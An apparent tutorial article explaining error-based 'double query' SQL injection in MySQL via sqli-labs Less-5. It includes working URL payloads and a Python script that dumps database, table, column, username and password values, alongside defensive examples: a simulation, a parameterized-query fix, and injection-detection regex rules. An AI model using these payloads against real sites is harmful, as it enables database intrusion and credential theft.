What is double query injection in SQL injection

2025-01-19 Update, from SLTechnology News&Howtos > Network Security

Shulou(Shulou.com)05/31 Report--

This article explains what double query injection is in SQL injection. The content is simple and clear, and I hope it helps resolve your doubts; let's study "what is double query injection in SQL injection" together.

What is double query injection?

The experts' explanations are rather abstract. Put plainly, it is a select statement with another select nested inside it, arranged so that the useful information is displayed in the SQL error message.

First, get to know the following functions and clause: concat(), rand(), floor(), count() and the group by clause.

① concat() function

I understand it as a join: concat() joins the items inside its parentheses together into one string.

② rand() function

It returns a random number between 0 and 1, the interval being [0, 1). With empty parentheses a fresh random number is generated each time.

When the argument in the parentheses is fixed (a seed), the random number sequence is fixed as well.

Let's look at such a random sequence:

select rand(3) from information_schema.columns limit 3;

This generates three random numbers.

Run it again and the result is the same: the seed fixes the sequence.

③ floor() function

The floor() function rounds down: given a non-integer, it returns the largest integer less than or equal to the input.

④ count() function

Used to count rows.

⑤ group by clause

First look at this statement:

select table_schema, table_name from information_schema.tables;

After adding a group by clause:

select table_schema, table_name from information_schema.tables group by table_schema;

The output is much less repetitive: each database appears only once, and only the first table of each database is shown. (MySQL 5.7 and later reject this non-aggregated select under the default ONLY_FULL_GROUP_BY sql_mode; the lab environment used here allows it.)

What unexpected results appear when these functions are combined? Let's try it out.

① rand() combined with floor()

select floor(rand(5)*12) from information_schema.columns limit 5;

Analysing from the inside out: rand(5) produces five values of the seeded sequence, multiplying by 12 stretches [0, 1) to [0, 12), and floor() then rounds each value down to an integer.

② count() combined with group by

select table_schema, count(*) from information_schema.tables group by table_schema;

Together they count how many tables each database has.

The principle: MySQL creates a temporary table with two fields, group_key and tally, where group_key carries a UNIQUE constraint, i.e. two rows cannot have the same group_key value. When a query uses group by together with count(), the database first creates this virtual table; whenever it encounters a key that is not yet in the table it inserts it, and if the key already exists it finds the tally field for that key and adds 1.

③ The core statement of double query (several functions combined)

First look at the payload:

select floor(rand(14)*2) c, count(*) from information_schema.columns group by c;

It throws an error. Why? Column c is the grouping column, and c is an alias for floor(rand(14)*2), which produces a fixed random sequence of 0s and 1s. The first four values of the sequence are 1, 0, 1, 0.

When the query runs, MySQL first creates a temporary table whose group_key field carries the UNIQUE constraint, plus the tally field. When it meets a group_key that is not in the temporary table it inserts it; if the group_key already exists it finds the tally field for that key and adds 1.

After creating the temporary table, MySQL scans information_schema.columns row by row. For the first row it evaluates the grouping expression floor(rand(14)*2), obtaining 1, and looks for a row with group_key 1 in the temporary table; there is none, so it inserts a new row whose group_key is floor(rand(14)*2). Note that the expression is evaluated again at this point, and this time the result is 0. So the row actually inserted has group_key 0 and tally 1, and the temporary table now holds that single row.

MySQL continues scanning information_schema.columns. For the second row it evaluates floor(rand(14)*2) again and gets 1 (the third number in the sequence), looks for group_key 1 in the temporary table, does not find it, and so tries to add a new row whose group_key is floor(rand(14)*2), evaluated once more, giving 0 (the fourth number in the sequence). It therefore tries to insert a row with group_key 0 and tally 1. But a row with group_key 0 already exists, and group_key must be unique, so the insert fails with a duplicate entry error, and that error message is what gets reported.
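To make the walkthrough above concrete, here is an added Python model (not part of the original article, and not MySQL's own code) of the temporary-table bookkeeping it describes: the grouping expression is evaluated once to look the row up and, when the key is new, a second time for the inserted row. The value sequences fed in are constructed to match the article's 1, 0, 1, 0 walkthrough; they are not the real output of MySQL's rand(14).

```python
import itertools

# Added example, not from the article: a toy model of the temporary table MySQL
# keeps for GROUP BY, used to show why a grouping expression that is evaluated
# twice per row (lookup, then insert) can collide on the UNIQUE group_key.


class DuplicateKeyError(Exception):
    """Stands in for MySQL's "Duplicate entry '...' for key 'group_key'" error."""


def simulate_group_by(row_count, key_expr):
    """Replay the GROUP BY bookkeeping over row_count scanned rows.

    key_expr is a zero-argument callable standing in for the grouping expression
    (the article's floor(rand(14)*2)). It is called once to look the row up and,
    when that key is not yet in the temporary table, a second time to produce
    the value actually stored. Returns {group_key: tally} or raises
    DuplicateKeyError when the second evaluation hits an existing key.
    """
    temp_table = {}  # group_key (UNIQUE) -> tally
    for _ in range(row_count):
        lookup_key = key_expr()          # first evaluation: which group is this row in?
        if lookup_key in temp_table:
            temp_table[lookup_key] += 1  # known group: just bump the tally
            continue
        insert_key = key_expr()          # second evaluation: value written to the new row
        if insert_key in temp_table:
            raise DuplicateKeyError(
                "Duplicate entry '%s' for key 'group_key'" % insert_key)
        temp_table[insert_key] = 1
    return temp_table


def group_by_errors(row_count, key_values):
    """True if feeding key_values (cycled) as the grouping expression errors out.

    key_values is a constructed sequence of what the expression would return on
    successive evaluations; it is cycled so short patterns such as [1, 0] can be
    tested against any number of rows.
    """
    stream = itertools.cycle(key_values)
    try:
        simulate_group_by(row_count, lambda: next(stream))
    except DuplicateKeyError:
        return True
    return False


if __name__ == "__main__":
    # Constructed to match the article's walkthrough (1, 0, 1, 0, ...); this is
    # not the real output of MySQL's rand(14).
    print("1,0,1,0 over 2 rows errors:", group_by_errors(2, [1, 0]))
    # A key that never changes between the two evaluations never collides.
    print("constant key over 3 rows:", simulate_group_by(3, lambda: 0))
    # Pairs that agree within a row but differ across rows build normal groups.
    print("0,0,1,1,1 over 3 rows errors:", group_by_errors(3, [0, 0, 1, 1, 1]))
```

The model also shows why a single scanned row can never collide (the first insert always succeeds) and why a deterministic expression such as a plain column never does: the two evaluations within one row always agree. Only an expression whose value can differ between the lookup and the insert, which is exactly what rand() provides, can trip the unique constraint.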

Now that the principle is clear, let's do some practice, taking sqli-labs Less-5 as an example:

First determine how the injection point is closed (Less-5 closes the id value with a single quote):

Then query the database name. Build the payload:

?id=-1' union select 1,count(*),concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a-- +

The database name is displayed in the error message.

However, because rand() is unseeded here, the error is triggered only about 50% of the time.

The same payload may just as well return a normal-looking page.

Some experts say that rand() can be made to error 100% of the time by changing its seed: replace rand() with rand(1), and the error is said to be triggered every time. That payload is:

?id=-1' union select 1,count(*),concat((select database()),floor(rand(1)*2)) as a from information_schema.tables group by a-- +

But I found that rand(1) does not error 100% of the time; on the contrary, I tried it several times and it did not error at all. Only the seeds 4, 11, 14 and 15 error 100% of the time. I do not know why, so I leave the question open here and hope an expert can explain it.

Let's get the tables. Knowing that the current database is security, we construct the payload:

?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),floor(rand(4)*2)) as a from information_schema.columns group by a-- +

There are four tables in total, and we got what we wanted in the third one.

Knowing the table name, look at the column names. Construct the payload:

?id=-1' union select 1,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 4,1),floor(rand(4)*2)) as a from information_schema.columns group by a-- +

By changing the value of X in limit X,1, I saw the password field at limit 3,1.

I got the username field at limit 9,1.

Then fetch the username and password. Construct the payload:

?id=-1' union select 1,count(*),concat((select username from users limit 0,1),floor(rand(4)*2)) as a from information_schema.columns group by a-- +

and

?id=-1' union select 1,count(*),concat((select password from users limit 0,1),floor(rand(4)*2)) as a from information_schema.columns group by a-- +

Note that the limit offsets used for the username and for the password must be changed in step, so that both refer to the same row.
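The whole chain above rests on two application defects that have nothing to do with rand(): the id parameter is spliced into the SQL text, and the database engine's error message is echoed back to the client. The following Python snippet is an added example (not from the article and not sqli-labs code) that reproduces a Less-5 style lookup against a constructed in-memory SQLite table in both forms: the concatenating version that leaks the engine's error, and the hardened version that binds the parameter and returns only a generic message while the detail goes to the server log. The table contents, function names and messages are assumptions.

```python
import logging
import sqlite3

# Added example, not from the article or from sqli-labs: a Less-5 style lookup
# implemented two ways against a constructed in-memory SQLite table.
# Function names, messages and table contents are assumptions.

log = logging.getLogger("less5")


def make_db():
    """Build a throwaway users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "pw-constructed-1"),
                      (2, "bob", "pw-constructed-2")])
    return conn


def lookup_vulnerable(conn, user_id):
    """The defective pattern: id spliced into the SQL text, DB error echoed back."""
    sql = "SELECT username FROM users WHERE id='%s' LIMIT 1" % user_id
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # Echoing the engine's message is what turns a syntax error into an oracle.
        return "You have an error in your SQL syntax: %s" % exc
    return "You are in" if row else "Not found"


def lookup_fixed(conn, user_id):
    """The hardened pattern: bound parameter, generic error page, detail to the log."""
    sql = "SELECT username FROM users WHERE id=? LIMIT 1"
    try:
        row = conn.execute(sql, (user_id,)).fetchone()
    except sqlite3.Error as exc:
        # The full message is still useful to operators, so it goes to the log only.
        log.error("database error for id=%r: %s", user_id, exc)
        return "Something went wrong"
    return "You are in" if row else "Not found"


if __name__ == "__main__":
    conn = make_db()
    for probe in ("1", "1'"):
        print(repr(probe), "vulnerable ->", lookup_vulnerable(conn, probe))
        print(repr(probe), "fixed      ->", lookup_fixed(conn, probe))
```

With the stray quote that the article uses to test the closing character, the vulnerable function hands the engine's own message to the caller, while the fixed one treats the whole value as a literal, finds no row, and gives the caller nothing to reason about. Either change alone (binding or error suppression) removes the error-based channel; both together are the normal state for production code.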

Finding it tedious? Here is the Python script by Mochaaz.

    import requests
    from bs4 import BeautifulSoup  # imported by the original script but not used

    db_name = ''
    table_list = []
    column_list = []
    url = "http://192.168.1.158/sqlilabs/Less-5/?id=1'"

    # get the current database name
    print('current database name:')
    payload = " and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select database()),0x3a,floor(rand(0)*2)))-- +"
    r = requests.get(url + payload)
    # the error text reads "Duplicate entry ':<value>:1' for key 'group_key'", so the
    # value sits between the two 0x3a colons
    db_name = r.text.split(':')[-2]
    print('[+]' + db_name)

    # get the table names
    print('table names under database %s:' % db_name)
    for i in range(50):
        payload = " and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select table_name from information_schema.tables where table_schema='%s' limit %d,1),0x3a,floor(rand(0)*2)))-- +" % (db_name, i)
        r = requests.get(url + payload)
        if 'group_key' not in r.text:  # no more rows: the subquery returned NULL, so no error
            break
        table_name = r.text.split(':')[-2]
        table_list.append(table_name)
        print('[+]' + table_name)

    # get the column names, taking the users table (the last table found) as an example
    print('column names under table %s:' % table_list[-1])
    for i in range(50):
        payload = " and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select column_name from information_schema.columns where table_name='%s' limit %d,1),0x3a,floor(rand(0)*2)))-- +" % (table_list[-1], i)
        r = requests.get(url + payload)
        if 'group_key' not in r.text:
            break
        column_name = r.text.split(':')[-2]
        column_list.append(column_name)
        print('[+]' + column_name)

    # get the field values, taking username (the second-to-last column) as an example
    print('field values under column %s:' % column_list[-2])
    for i in range(50):
        payload = " and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)*2)))-- +" % (column_list[-2], db_name, table_list[-1], i)
        r = requests.get(url + payload)
        if 'group_key' not in r.text:
            break
        dump = r.text.split(':')[-2]
        print('[+]' + dump)

What took hours of manual injection, the script finishes in seconds.
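From the defender's side, a script like the one above leaves a very recognisable trail: every request carries floor(rand(...)), group by and information_schema in the query string, and the responses are error pages. The following added Python example (not from the article) parses a few constructed Apache-style access-log lines and flags the requests that match those signatures; the log lines, rule names and the 192.0.2.x addresses are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Added example, not from the article: signature checks for error-based
# (double query) injection attempts over web server access logs.

# Constructed sample in Apache combined format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [31/May/2021:10:00:01 +0000] "GET /sqlilabs/Less-5/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [31/May/2021:10:00:05 +0000] "GET /sqlilabs/Less-5/?id=-1%27%20union%20select%201,count(*),concat((select%20database()),floor(rand(14)*2))%20as%20a%20from%20information_schema.tables%20group%20by%20a--%20+ HTTP/1.1" 500 733 "-" "Mozilla/5.0"
192.0.2.11 - - [31/May/2021:10:00:09 +0000] "GET /index.php?page=group+by+products HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')

# A rule fires only when every pattern in its list is present in the request.
RULES = {
    "double_query": [re.compile(r"floor\s*\(\s*rand\s*\("), re.compile(r"group\s+by")],
    "schema_probe": [re.compile(r"information_schema\.")],
    "union_select": [re.compile(r"union\s+(all\s+)?select")],
}


def normalize(uri):
    """Decode twice so single- and double-encoded parameters compare equal, then lowercase."""
    return unquote_plus(unquote_plus(uri)).lower()


def scan_request(uri):
    """Return the sorted names of the rules that match this request URI."""
    text = normalize(uri)
    return sorted(name for name, patterns in RULES.items()
                  if all(p.search(text) for p in patterns))


def scan_log(log_text):
    """Parse combined-format lines and return a record for each request that matched a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        rules = scan_request(m["uri"])
        if rules:
            hits.append({"ip": m["ip"], "time": m["ts"],
                         "status": m["status"], "rules": rules})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["status"], ", ".join(hit["rules"]))
```

The double_query rule requires both the floor(rand( and the group by fragments, so an ordinary page whose parameters happen to contain the words "group by" (the third sample line) is not flagged. A 500 status beside such a hit, as in the second line, is the clearest sign that the engine's error text reached the client, which is the condition the technique depends on.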

That is all of "what is double query injection in SQL injection". Thank you for reading! I hope the content has helped; if you want to learn more, follow the industry information channel.
